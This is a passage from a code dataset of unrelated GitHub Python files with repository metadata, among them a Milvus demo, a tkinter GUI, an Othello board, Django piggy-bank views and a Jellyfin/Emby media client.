lists.\n \"\"\"\n\n html = \"\"\n\n html += \"
<html> <head> <title> Category Tree Rooted at ID: {} </title> </head>\".format(cid)\n\n    html += \"<body>\"\n    html += create_html_list(category_list)\n    html += \"</body>\"\n    html += \"</html>\"\n\n    f = open(str(cid) +\".html\", \"w+\", encoding='utf-8')\n    f.write(html)\n    f.close()\n\n\ndef create_html_list(category_list):\n    \"\"\"\n    Create an html list recursively using arg data\n\n    :param category_list (list): list of category data\n\n    :return (str): html script of recursive ul\n    \"\"\"\n\n    html_list = \"<ul>\"\n\n    for item in category_list:\n        if isinstance(item, list):\n            html_list += create_html_list(item)\n        else:\n            html_list += \"
<li> ID: {} Name: {} OfferEnable: {} </li>\\n\".format(item[0], item[2], \"True\" if item[3] else \"False\")\n\n    html_list += \"</ul>
\\n\"\n\n return html_list\n","repo_name":"vivekpabani/EbayCategoryTree","sub_path":"create_html.py","file_name":"create_html.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11987792008","text":"#### conda env vicuna\n\nfrom pymilvus import (\n connections,\n utility,\n FieldSchema,\n CollectionSchema,\n DataType,\n Collection,\n)\n\nconnections.connect(\"default\", host=\"xxx.xxx.xxx.xxx\", port=\"19530\")\n\n## https://github.com/milvus-io/milvus/issues/19090\nfields = [\n FieldSchema(name=\"pk\", dtype=DataType.INT64, is_primary=True, auto_id=False),\n FieldSchema(name=\"random\", dtype=DataType.VARCHAR, max_length=65535 ), # DataType.DOUBLE DataType.VARCHAR\n FieldSchema(name=\"embeddings\", dtype=DataType.FLOAT_VECTOR, dim=8)\n]\nschema = CollectionSchema(fields, \"hello_milvus is the simplest demo\")\nhello_milvus = Collection(\"hello_milvus\", schema)\n\nimport random\n\nmax_len=10\nentities = [\n [i for i in range(max_len)], # field pk\n [str('A_')+str(float(random.randrange(-20, -10))) for _ in range(max_len)], # field random in varchar\n # [float(random.randrange(-20, -10)) for _ in range(max_len)], # field random\n [[random.random() for _ in range(8)] for _ in range(max_len)], # field embeddings\n]\n\nprint(' entities : ',entities)\n\n\ninsert_result = hello_milvus.insert(entities)\n# # After final entity is inserted, it is best to call flush to have no growing segments left in memory\nhello_milvus.flush() \n\n### Description of parameters in index creation\n### ref: https://milvus.io/docs/build_index.md\n### ref: https://milvus.io/docs/index.md\nindex = {\n \"index_type\": \"IVF_FLAT\",\n \"metric_type\": \"L2\",\n \"params\": {\"nlist\": 128},\n}\nhello_milvus.create_index(\"embeddings\", index)\n\n\nhello_milvus.load()\nprint(' shape : ',len(entities), ' ---> ',len(entities[0]))\nvectors_to_search = entities[-1][-1:]\ntext_=entities[1][-1:]\nprint( ' query : ',vectors_to_search)\nprint( ' text : ',text_)\n\nsearch_params = {\n \"metric_type\": \"L2\",\n \"params\": {\"nprobe\": 10},\n}\nresult = hello_milvus.search(vectors_to_search, \"embeddings\", search_params, limit=3, output_fields=[\"random\"])\nprint(' 1 ===> ',result)\n\n# result = hello_milvus.query(expr=\"random > -14\",limit=3, output_fields=[\"random\", \"embeddings\"])\n# print(' 2 ===> ',result)\n\n# result = hello_milvus.search(vectors_to_search, \"embeddings\", search_params, limit=3, expr=\"random > -12\", output_fields=[\"random\"])\n# print(' 3 ===> ',result)\n\n\n### Delete content in collection\n# expr = \"\"\"pk in [0,3000]\"\"\"\n# hello_milvus.delete(expr)\n\n#### Drop database\n# utility.drop_collection(\"hello_milvus\")\n\n\n","repo_name":"hkbtotw/Openai-X-Milvus-Question-Answer-with-Custom-Knowledge","sub_path":"test_pymilvus_ver1.py","file_name":"test_pymilvus_ver1.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"8804844133","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 24 14:03:58 2023\n\n@author: sabo4ever\n\"\"\"\n\nimport numpy as np\nfrom numba import njit\nimport pandas as pd\n\n\n@njit\ndef hanning_window(x):\n return x * 2 * np.power((np.sin(np.pi * np.arange(len(x)) / (len(x)) )), 2)\n@njit\ndef A(a, b, c):\n return (-(a + b * c) * (a - b) + b * np.sqrt(c**2 * (a + b)**2 - 2 * a * b * (2 * c**2 - c - 1))) / (a**2 + b**2 + 2 * a * b * 
c)\n@njit\ndef interpolation(data):\n index = np.argmax(data)\n N=len(data)\n \n if index==0:\n return 0.0\n elif (index== N-1):\n return 1.0\n if (data[index - 1] > data[index + 1]):\n i1 = index - 1\n i2 = index\n index = index - 1\n else:\n i1 = index\n i2 = index + 1\n value= (index/N)+(1.0/(2.0*np.pi))*np.arcsin(A(data[i1], data[i2], np.cos(2.0*np.pi/N)) * np.sin(2.0*np.pi/N))\n return abs(value)\n \n\ndef fft_tune(x,px,alf,beta):\n xn=x/np.sqrt(beta)\n pxn=alf*x/np.sqrt(beta) + px*np.sqrt(beta)\n xn=hanning_window(xn)\n pxn=hanning_window(pxn)\n coords=xn - 1j * pxn\n freqs=np.fft.fft(coords)\n return interpolation(abs(freqs))\n\ndef quad_func(x,a2,a0):\n return a2*np.square(x)+a0\n\n\ndef cart2pol(x, y):\n rho = np.sqrt(x**2 + y**2)\n phi = np.arctan2(y, x)\n return(rho, phi)\n\ndef trig_area(x1, y1, x2, y2, x3, y3):\n # calculate the area using the formula above\n area = 0.5 * abs(x1*(y2-y3) + x2*(y3-y1) + x3*(y1-y2))\n return area\n\ndef shape_area(x,px,x0=0,px0=0):#need to have shape centred around 0,0. orelse coords not ordered right\n r,theta = cart2pol(x,px)\n data = {\"theta\":theta,\"r\":r}\n polar = pd.DataFrame(data=data)\n polar = polar.sort_values(by=\"theta\")\n \n x_re = list(polar.r*np.cos(polar.theta))\n px_re = list(polar.r*np.sin(polar.theta))\n \n area=0\n for j in range (len(r)-1):\n area += trig_area(x0, px0, x_re[j], px_re[j], x_re[j+1], px_re[j+1])\n \n return area","repo_name":"sabrinawaa/Sabrina-Project","sub_path":"henon_funcs.py","file_name":"henon_funcs.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33451498291","text":"from functools import partial as pto\nfrom tkinter import Tk, Button, X, messagebox\n\nWARN = 'warn'\nCRITICAL = 'critical'\nREGULAR = 'regular'\n\n# define the SIGNS levels\nSIGNS = {\n 'do not enter': CRITICAL,\n 'railroad crossing': WARN,\n '55\\nspeed limit': REGULAR,\n 'wrong way': CRITICAL,\n 'merging traffic': WARN,\n 'one way': REGULAR,\n}\n\ndef critical_msg():\n return messagebox.showerror('Error', 'Error Button Pressed!')\n\ndef warn_msg():\n return messagebox.showwarning('Warning', 'Warning Button Pressed!')\n\ndef info_msg():\n return messagebox.showinfo('Info', 'Info Button Pressed!')\n# critical_msg = lambda: messagebox.showerror('Error', 'Error Button Pressed!')\n# warn_msg = lambda: messagebox.showwarning('Warning','Warning Button Pressed!')\n# info_msg = lambda: messagebox.showinfo('Info', 'Info Button Pressed!')\n\ntop = Tk()\ntop.title('Road Signs')\nButton(top, text='QUIT', command=top.quit, bg='red', fg='white').pack()\n\nmy_button = pto(Button, top)\n# Here is 2 level of partial\ncritical_button = pto(my_button, command=critical_msg, bg='white', fg='red')\nwarn_button = pto(my_button, command=warn_msg, bg='goldenrod1')\nregular_button = pto(my_button, command=info_msg, bg='white')\n\nfor eachSign in SIGNS:\n signType = SIGNS[eachSign]\n # In non-web environment, eval & for can be used to dynamically\n # generate expressions to execute\n cmd = '%s_button(text=%r%s).pack(fill=X, expand=True)'%(\n signType, eachSign,\n '.upper()' if signType == CRITICAL else '.title()')\n eval(cmd)\n\ntop.mainloop()\n\n\n","repo_name":"c4fun/core-python-programming","sub_path":"ch19 GUI Programming/pfaGUI2.py","file_name":"pfaGUI2.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35016295495","text":"class Estudiante:\n def 
__init__(self, nombre, edad, grado):\n self.nombre = nombre\n self.edad = edad\n self.grado = grado\n\nclass RegistroEstudiantes:\n def __init__(self):\n self.estudiantes = []\n self.cantidad = 0\n\n def agregar_estudiante(self, estudiante):\n self.estudiantes.append(estudiante)\n self.cantidad += 1\n\n def mostrar_estudiantes(self):\n print(\"Estudiantes en el registro:\")\n for estudiante in self.estudiantes:\n print(f\"Nombre: {estudiante.nombre}, Edad: {estudiante.edad}, Grado: {estudiante.grado}\")\n\n def buscar_estudiante(self, nombre):\n for estudiante in self.estudiantes:\n if estudiante.nombre == nombre:\n print(f\"Detalles del estudiante {nombre}:\")\n print(f\"Edad: {estudiante.edad}\")\n print(f\"Grado: {estudiante.grado}\")\n return\n print(f\"No se encontró al estudiante {nombre} en el registro.\")\n\n def eliminar_estudiante(self, nombre):\n for estudiante in self.estudiantes:\n if estudiante.nombre == nombre:\n self.estudiantes.remove(estudiante)\n self.cantidad -= 1\n print(f\"El estudiante {nombre} ha sido eliminado del registro.\")\n return\n print(f\"No se encontró al estudiante {nombre} en el registro.\")\n\n\n# Crear un objeto RegistroEstudiantes\nregistro = RegistroEstudiantes()\n\n# Crear objetos Estudiante\nestudiante1 = Estudiante(\"Pablo\", 15, 9)\nestudiante2 = Estudiante(\"María\", 16, 10)\nestudiante3 = Estudiante(\"Jaime\", 14, 8)\n\n# Agregar estudiantes al registro\nregistro.agregar_estudiante(estudiante1)\nregistro.agregar_estudiante(estudiante2)\nregistro.agregar_estudiante(estudiante3)\n\n# Mostrar los estudiantes en el registro\nregistro.mostrar_estudiantes()\n\n# Buscar un estudiante por nombre\nregistro.buscar_estudiante(\"María\")\n\n# Eliminar un estudiante por nombre\nregistro.eliminar_estudiante(\"Juan\")\n\n# Mostrar los estudiantes actualizados en el registro\nregistro.mostrar_estudiantes()\n","repo_name":"JaimeNevado/Docencia-Clases-Particulares","sub_path":"ClasesPablo/Ejercicios 7/ejercicio1.py","file_name":"ejercicio1.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15594748358","text":"def citire(n):\n v = []\n for i in range(0,n):\n x = int(input(\"dati elemnt: \"))\n v.append(x)\n return v\ndef cifre(a,b):\n v1 = [0,0,0,0,0,0,0,0,0,0]\n v2 = [0,0,0,0,0,0,0,0,0,0]\n cont = 0\n \n while a > 0:\n v1[a%10] = v1[a%10] + 1\n a=int(a/10)\n while b > 0:\n v2[b%10] = v2[b%10] + 1\n b = int(b/10)\n for i in range(0,10):\n if(v1[i] != 0 and v2[i] != 0):\n cont = cont + 1\n\n if cont >= 2:\n return True\n else:\n return False\n \n\ndef secv(n):\n pstop = 0\n last = 0 \n maxim = 1\n d = 1\n v = citire(n)\n for i in range(0,n-1):\n if(cifre(v[i],v[i+1]) == True):\n pstop = i + 1\n d = d + 1\n if d > maxim:\n maxim = d\n last = pstop\n else:\n d = 1\n for i in range (last - maxim + 1,last + 1):\n print(v[i])\n \n \ndef main():\n n=int(input(\"dati n: \"))\n \n secv(n)\n \n","repo_name":"boldijar/babes-info-romana","sub_path":"Fundamentele programarii/lab2/14-cel putin2 cifre distincte.py","file_name":"14-cel putin2 cifre distincte.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"32"} +{"seq_id":"23151768145","text":"#!/usr/bin/env python\nimport rospy\nimport json\nfrom std_msgs.msg import Float64\n\ndef callback(data):\n delay = rospy.get_time() - data.data\n rospy.loginfo(rospy.get_caller_id() + \" I heard '%s'\", delay)\n\ndef listener():\n # init node\n 
rospy.init_node('listener', anonymous=True)\n\n rospy.Subscriber(\"timestamptopic\", Float64, callback)\n\n # spin() simply keeps python from exiting until this node is stopped\n rospy.spin()\n\nif __name__ == '__main__':\n listener()\n","repo_name":"robertoooo/ROS_AWS_IoT","sub_path":"src/aws_mqtt_bridge/listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"71434007772","text":"import pandas as pd\nimport torch\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set_style('whitegrid')\n\n\nN = 1000\npoi = torch.distributions.Poisson(torch.tensor([3.0]))\nber = torch.distributions.Bernoulli(torch.tensor([0.7]))\n\np = poi.sample((N,))\nb = ber.sample((N,))\n\n\np = p.numpy()\nb = b.numpy()\n\npb = np.multiply(p,b)\n\nplt.hist(p)\nplt.show()\n\nplt.hist(pb)\nplt.show()","repo_name":"kavu16/College-Work","sub_path":"MachineLearning/HW3.2.py","file_name":"HW3.2.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6903008750","text":"import numpy as np\nimport string\nimport pawn_file\nimport utils\n\nWIDTH = 8\nLENGTH = 8\n\nNULL_VALUE = ' '\nvalue_mask = {\n \"O\" : 1,\n \"X\" : -1\n }\n\nTURN = {True : 'O', False : 'X'}\nclass Board(object):\n def __init__(self):\n self.board = np.array([NULL_VALUE] * WIDTH * LENGTH).reshape((LENGTH,WIDTH)).astype(dtype='object')\n self.Pawn_list = []\n self.Next_to_move = True\n self.Move_list = []\n \n def place_pawn(self, Coord_tar_str, couleur):\n ### le if pour savoir si place libre fais avant normalement\n x, y = utils.Convert_str_coord(Coord_tar_str)\n Pawn = pawn_file.pawn(couleur, pos = (x, y))\n self.board[y, x] = Pawn\n self.Pawn_list.append(Pawn)\n self.Next_to_move = not self.Next_to_move\n self.Move_list.append(f'{couleur}-{Coord_tar_str}')\n \n def remove_pawn(self, Coord_tar_str):\n x, y = utils.Convert_str_coord(Coord_tar_str)\n self.board[y, x] = NULL_VALUE\n self.Next_to_move = not self.Next_to_move\n self.Move_list.pop()\n \n def init_table(self):\n self.place_pawn('E4', 'O')\n self.place_pawn('D5', 'O')\n self.place_pawn('D4', 'X')\n self.place_pawn('E5', 'X')\n\n def print_board(self):\n print(self.board.astype(str))\n \n def Get_board_mask(self):\n b = self.board.astype(str)\n tmp = np.zeros(b.shape)\n for i, e in enumerate(np.unique(b)):\n if e!= NULL_VALUE:\n tmp[b==e] = value_mask[e]\n return tmp\n\n def Get_fen(self):\n Fen = ''\n for row in self.board.astype(str):\n offset = 0\n for e in row:\n if e == NULL_VALUE:\n offset+=1\n else:\n if offset!=0:\n Fen+=str(offset)\n offset = 0\n Fen+=e\n if offset!=0:\n Fen+=str(offset)\n Fen+='/'\n Fen += f' {TURN[self.Next_to_move]}'\n return Fen\n ","repo_name":"BenBouiss/Othello","sub_path":"board_file.py","file_name":"board_file.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"73048366811","text":"import pathlib\nfrom setuptools import find_packages, setup\n\n# The directory containing this file\nHERE = pathlib.Path(__file__).parent\n\n# The text of the README file\nREADME = (HERE / \"README.md\").read_text()\n\n# This call to setup() does all the work\nsetup(\n name=\"CAImport\",\n version=\"1.0.9\",\n description=\"Coding Around simple tools for python\",\n long_description=README,\n 
long_description_content_type=\"text/markdown\",\n url=\"https://github.com/codingaround/CAImport.git\",\n author=\"codingaround\",\n author_email=\"codingaround90s@gmail.com\",\n license=\"GNU\",\n classifiers=[\n \"License :: OSI Approved :: GNU Affero General Public License v3\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.9\",\n ],\n # packages=[\"CAImport\"],\n packages=find_packages(exclude=(\"tests\",)),\n install_requires=['grequests'],\n # entry_points={\n # \"console_scripts\": [\n # \"realpython=instanceTuner.__main__:main\",\n # ]\n # },\n)\n","repo_name":"codingaround/CAImport","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40508161934","text":"class Solution:\n def luckyNumbers (self, matrix: list) -> list:\n m, n = len(matrix), len(matrix[0])\n \n row_min = []\n for i in range(m):\n row_min.append(min(matrix[i]))\n \n col_max = []\n for j in range(n):\n col_max.append(max([row[j] for row in matrix]))\n \n return [element for element in row_min if element in col_max]\n \nif __name__ == '__main__':\n s = Solution()\n matrix = [[3,7,8],[9,11,13],[15,16,17]]\n print(s.luckyNumbers(matrix))","repo_name":"Yonoi/partner","sub_path":"msun/others/1380.py","file_name":"1380.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23297638675","text":"from unicodedata import category\nfrom django.shortcuts import render\nfrom rest_framework.response import Response\nfrom rest_auth.views import APIView\nfrom .models import Category, PiggyBank, Transaction, UserSavings\nfrom .serializers import CategorySerializer, PiggyBankSerializer\n# Create your views here.\nfrom rest_framework import status\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.permissions import BasePermission, IsAuthenticated, SAFE_METHODS, AllowAny\nfrom typing import List, Any\n\n\nclass CategoriesView(APIView):\n def get(self, request):\n categories = Category.objects.all()\n data = CategorySerializer(categories, many=True).data\n return Response(data)\n\nclass TransactionView(APIView):\n authentication_classes: List = []\n permission_classes: List[Any] = [AllowAny]\n\n \n def post(self, request):\n try:\n tr = Transaction(\n amount=int(request.POST.get(\"amount\")),\n category=Category.objects.get(pk=int(request.POST.get(\"category\"))),\n user=int(request.POST.get(\"user\"))\n )\n tr.save()\n try:\n usgs = UserSavings.objects.get(user=tr.user)\n pgbk = PiggyBank.objects.filter(user=tr.user, category=tr.category)\n if pgbk:\n pgbk = pgbk[0]\n pgbk.current_amount += pgbk.acummulating_rate * tr.amount\n pgbk.save()\n except:pass\n return Response(status=status.HTTP_200_OK)\n\n except Exception as e:\n return Response(e)\n\n\nclass PiggyBankView(APIView):\n authentication_classes: List = []\n permission_classes: List[Any] = [AllowAny]\n\n def get(self, request):\n pbs = PiggyBank.objects.filter(user=int(self.request.query_params.get('user')))\n data = PiggyBankSerializer(pbs, many=True).data\n data = {\n \"piggy_banks\": data,\n \"user_bank\": UserSavings.objects.get(user=int(self.request.query_params.get('user'))).amount\n }\n return Response(data)\n\n def post(self, request):\n CATEGORIES = {\n 'ENTERTAINMENT': 6,\n 'TRANSPORTATION': 5,\n 'CLOTHES': 4,\n 'GROCERIES': 2,\n 'FOOD': 1,\n }\n # 
print(request.POST)\n # print(\"asdf\")\n print(request.data)\n # print(request.data[\"limit\"])\n try:\n pb = PiggyBank(\n limit=int(request.data['budgetLimit']),\n category=Category.objects.get(pk=CATEGORIES[request.data['type']]),\n acummulating_rate=float(request.data[\"rate\"]),\n user=1,\n name=request.data['name'],\n )\n pb.save()\n return Response(status=status.HTTP_200_OK)\n except Exception as e:\n return Response(e)\n\n","repo_name":"iberdiev/peggy_wise","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9780092779","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# 1. What does an empty dictionary's code look like?\n\n# In[1]:\n\n\ndict = {}\ntype(dict)\n \n\n\n# 2. What is the value of a dictionary value with the key 'foo' and the value 42?\n\n# In[2]:\n\n\n{'foo':42}\n\n\n# 3.What is the most significant distinction between a dictionary and a list?\n# \n# \n# List - items in list are Ordered\n# Dictionary : iten in dictionary are unordered\n\n# 5.If a dictionary is stored in spam, what is the difference between the expressions 'cat' in spam and 'cat' in spam.keys()?\n\n# In[4]:\n\n\nspam ={'cat':100}\n'cat' in spam\n \n\n\n# In[5]:\n\n\n'cat' in spam.keys()\n\n\n# In[6]:\n\n\nspam ={'cat':100}\n'cat' in spam.values()\n\n\n# 7.What is a shortcut for the following code?\n# \n\n# In[9]:\n\n\nspam ={'cat':100}\nspam.setdefault('Doll','pink')\nspam\n\n\n# 8.How do you 'pretty print' dictionary values using which module and function?\n\n# In[10]:\n\n\nimport pprint\ndct = [ {'Name': 'Shruti', 'Age': '20', 'Country': 'India'},\n {'Name': 'Ashia', 'Age': '26', 'Country': 'China'},\n {'Name': 'Joe', 'Age': '29', 'Country': 'UK'},\n {'Name': 'Chumlee', 'Age': '35', 'Country': 'USA'}\n]\n\n\n# In[11]:\n\n\npprint.pprint(dct)\n \n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"shrutilalwani07/Ineuron-Assignments","sub_path":"Assignment_5.py","file_name":"Assignment_5.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5164507565","text":"from .mediaserver_information import check_information\nfrom .playback_reporting import *\n\n# Some mildly important variables #\nglobal version\nversion = \"0.3.dev9\"\nappname = \"Puddler\"\n\n\ndef green_print(text):\n print(\"\\033[92m{}\\033[00m\".format(text))\n\n\ndef blue_print(text):\n print(\"\\033[96m{}\\033[00m\".format(text))\n\n\ndef red_print(text):\n print(\"\\033[91m{}\\033[00m\".format(text))\n\n\ndef close_session():\n if use_rpc:\n rpc.close()\n exit()\n\n\ndef choosing_media(head_dict):\n def json_alone(items):\n count = 0\n for x in items:\n count = count + 1\n if count != 1:\n return False\n else:\n return True\n\n def print_json(items, count=False, add_to=None):\n if not add_to:\n item_list = []\n else:\n # For smol brains\n item_list = add_to\n for x in items[\"Items\"]:\n if x[\"Name\"] not in item_list:\n item_list.append(x)\n if not x[\"UserData\"][\"Played\"]:\n if \"PlayedPercentage\" in x[\"UserData\"]:\n percentage = \"{}%\".format(int(x.get(\"UserData\").get(\"PlayedPercentage\")))\n if not count:\n print(\n \" [{}] {} - ({}) {}\".format(\n item_list.index(x), x.get(\"Name\"), x.get(\"Type\"), percentage))\n else:\n blue_print(\" [{}] {} - ({})\".format(\"Enter\", x.get(\"Name\"), x.get(\"Type\")))\n try:\n input()\n except KeyboardInterrupt:\n close_session()\n 
else:\n if not count:\n print(\n \" [{}] {} - ({})\".format(item_list.index(x), x.get(\"Name\"), x.get(\"Type\")))\n else:\n blue_print(\" [{}] {} - ({})\".format(\"Enter\", x.get(\"Name\"), x.get(\"Type\")))\n try:\n input()\n except KeyboardInterrupt:\n close_session()\n else:\n if not count:\n print(\n \" [{}] {} - ({})\".format(item_list.index(x), x.get(\"Name\"), x.get(\"Type\")), end=\"\")\n green_print(\" [PLAYED]\")\n else:\n blue_print(\" [{}] {} - ({}) [PLAYED]\".format(\"Enter\", x.get(\"Name\"), x.get(\"Type\")))\n try:\n input()\n except KeyboardInterrupt:\n close_session()\n return item_list\n\n def process_input(already_asked, item_list):\n if len(item_list) > 1:\n if not already_asked:\n try:\n raw_pick = input(\": \")\n except KeyboardInterrupt:\n close_session()\n else:\n raw_pick = search\n pick = int(re.sub(\"[^0-9]\", \"\", raw_pick))\n if pick < (len(item_list) + 1) and not pick < 0:\n print(\"\\nYou've chosen \", end=\"\")\n blue_print(item_list[pick].get(\"Name\"))\n else:\n print(\"Are you stupid?!\")\n exit()\n return pick\n elif len(item_list) == 1:\n pick = 0\n return pick\n else:\n print(\"Nothing found.\\n\")\n item_list = choosing_media(head_dict)\n streaming(head_dict, item_list)\n\n ipaddress = head_dict.get(\"config_file\").get(\"ipaddress\")\n media_server = head_dict.get(\"media_server\")\n user_id = head_dict.get(\"config_file\").get(\"app_auth\").get(\"user_id\")\n request_header = head_dict.get(\"request_header\")\n nextup = requests.get(\n \"{}{}/Users/{}/Items/Resume\"\n .format(ipaddress, media_server, user_id), headers=request_header)\n if \"Id\" in nextup.text:\n print(\"\\nContinue Watching:\")\n item_list = print_json(nextup.json())\n next_up = True\n else:\n next_up = False\n latest = requests.get(\"{}{}/Users/{}/Items/Latest\"\n .format(ipaddress, media_server, user_id), headers=request_header)\n latest = {\n \"Items\": latest.json()\n }\n print(\"\\nLatest:\")\n if next_up:\n item_list = print_json(latest, add_to=item_list)\n else:\n item_list = print_json(latest)\n try:\n search = input(\n \"Please choose from above, enter a search term, or type \\\"ALL\\\" to \"\n \"display literally everything.\\n: \")\n except KeyboardInterrupt:\n close_session()\n if search != \"ALL\" and not re.search(\"^[0-9]+$\", search):\n items = requests.get(\"{}{}/Items?SearchTerm={}&UserId={}&Recursive=true&IncludeItemTypes=Series,Movie\"\n .format(ipaddress, media_server, search, user_id), headers=request_header)\n if json_alone(items.json()[\"Items\"]):\n print(\"\\nOnly one item has been found.\\nDo you want to select this title?\")\n item_list = print_json(items.json(), True)\n else:\n print(\"Please choose from the following results: \")\n item_list = print_json(items.json())\n pick = process_input(False, item_list)\n elif search == \"ALL\":\n items = requests.get(\"{}{}/Items?SearchTerm=&UserId={}&Recursive=true&IncludeItemTypes=Series,Movie\"\n .format(ipaddress, media_server, user_id), headers=request_header)\n if json_alone(items.json()[\"Items\"]):\n print(\"\\nOnly one item has been found.\\nDo you want to select this title?\")\n item_list = print_json(items.json(), True)\n else:\n print(\"Please choose from the following results: \")\n item_list = print_json(items.json())\n pick = process_input(False, item_list)\n else:\n pick = process_input(True, item_list)\n return item_list[pick]\n\n\ndef streaming(head_dict, item_list):\n from .playing import run_mpv\n\n def playlist(starting_pos):\n stream_url = 
(\"{}{}/Videos/{}/stream?Container=mkv&Static=true&SubtitleMethod=External&api_key={}\".format(\n ipaddress, media_server, episode_list[starting_pos].get(\"Id\"),\n request_header.get(\"X-Emby-Token\")))\n run_mpv(stream_url, episode_list[starting_pos], head_dict, appname)\n next_ep = True\n while next_ep:\n starting_pos = starting_pos + 1\n if starting_pos == len(episode_list):\n return\n try:\n green_print(\"\\nWelcome back. Do you want to continue playback with:\")\n blue_print(\" {} - {} - {}\"\n .format(episode_list[starting_pos].get(\"SeriesName\"),\n episode_list[starting_pos].get(\"SeasonName\"),\n episode_list[starting_pos].get(\"Name\")))\n print(\" (Y)es | (N)o | (E)xit\\n: \", end=\"\")\n what = get_keypress(\"YyNnEe\")\n if what in \"Yy\":\n next_ep = True\n elif what in \"Nn\":\n next_ep = False\n return\n elif what in \"Ee\":\n close_session()\n except KeyboardInterrupt:\n close_session()\n print(\"Starting playback of:\")\n blue_print(\" {}\".format(episode_list[starting_pos].get(\"Name\")))\n stream_url = (\n \"{}{}/Videos/{}/stream?Container=mkv&Static=true&SubtitleMethod=External&api_key={}\".format(\n ipaddress, media_server, episode_list[starting_pos].get(\"Id\"),\n request_header.get(\"X-Emby-Token\")))\n run_mpv(stream_url, episode_list[starting_pos], head_dict, appname)\n\n ipaddress = head_dict.get(\"config_file\").get(\"ipaddress\")\n media_server = head_dict.get(\"media_server\")\n media_server_name = head_dict.get(\"media_server_name\")\n user_id = head_dict.get(\"config_file\").get(\"app_auth\").get(\"user_id\")\n request_header = head_dict.get(\"request_header\")\n if item_list.get(\"Type\") in \"Movie\":\n print(\"Starting mpv...\".format(item_list.get(\"Name\")))\n stream_url = (\"{}{}/Videos/{}/stream?Container=mkv&Static=true&SubtitleMethod=External&api_key={}\".format(\n ipaddress, media_server, item_list.get(\"Id\"), request_header.get(\"X-Emby-Token\")))\n run_mpv(stream_url, item_list, head_dict, appname)\n elif item_list.get(\"Type\") == \"Series\":\n print(\"{}:\".format(item_list.get(\"Name\")))\n series = requests.get(\"{}{}/Users/{}/Items?ParentId={}\".format(\n ipaddress, media_server, user_id, item_list.get(\"Id\")), headers=request_header).json()\n season_list = []\n for x in series[\"Items\"]:\n season_list.append(x)\n episode_list = []\n for y in season_list:\n print(\" {}\".format(y.get(\"Name\")))\n episodes = requests.get(\"{}{}/Users/{}/Items?ParentId={}\".format(\n ipaddress, media_server, user_id, y.get(\"Id\")), headers=request_header).json()\n for z in episodes[\"Items\"]:\n if z in episode_list:\n if z.get(\"SeasonName\") != \"Specials\":\n continue\n z[\"fuck\"] = \"me\"\n episode_list.append(z)\n else:\n episode_list.append(z)\n if z.get(\"UserData\").get(\"Played\") == 0:\n print(\" [{}] {}\".format(episode_list.index(z), z.get(\"Name\")))\n else:\n print(\" [{}] {}\".format(episode_list.index(z), z.get(\"Name\")), end=\"\")\n green_print(\" [PLAYED]\")\n try:\n starting_pos = input(\"Please enter which episode you want to continue at (number)\\n: \")\n except KeyboardInterrupt:\n close_session()\n starting_pos = int(re.sub(\"[^0-9]\", \"\", starting_pos))\n if starting_pos < (len(episode_list) + 1) and not starting_pos < 0:\n print(\"\\nYou've chosen \", end=\"\")\n blue_print(episode_list[starting_pos].get(\"Name\"))\n else:\n print(\"Are you stupid?!\")\n exit()\n playlist(starting_pos)\n elif item_list.get(\"Type\") in \"Episode Special\":\n series = requests.get(\"{}{}/Users/{}/Items?ParentId={}\".format(\n ipaddress, 
media_server, user_id, item_list.get(\"SeriesId\")), headers=request_header).json()\n season_list = []\n for x in series[\"Items\"]:\n season_list.append(x)\n episode_list = []\n for y in season_list:\n episodes = requests.get(\"{}{}/Users/{}/Items?ParentId={}\".format(\n ipaddress, media_server, user_id, y.get(\"Id\")), headers=request_header).json()\n for z in episodes[\"Items\"]:\n if z in episode_list:\n if z.get(\"SeasonName\") != \"Specials\":\n continue\n z[\"fuck\"] = \"me\"\n episode_list.append(z)\n else:\n episode_list.append(z)\n starting_pos = episode_list.index(item_list)\n playlist(starting_pos)\n else:\n print(\"The object type you've chosen is invalid.\\nPlease report this on github.\")\n green_print(\"All playback has finished.\\nPress [Enter] to search for something else.\")\n try:\n input()\n except KeyboardInterrupt:\n close_session()\n item_list = choosing_media(head_dict)\n streaming(head_dict, item_list)\n\n\ndef main():\n head_dict = check_information(appname, version)\n item_list = choosing_media(head_dict)\n streaming(head_dict, 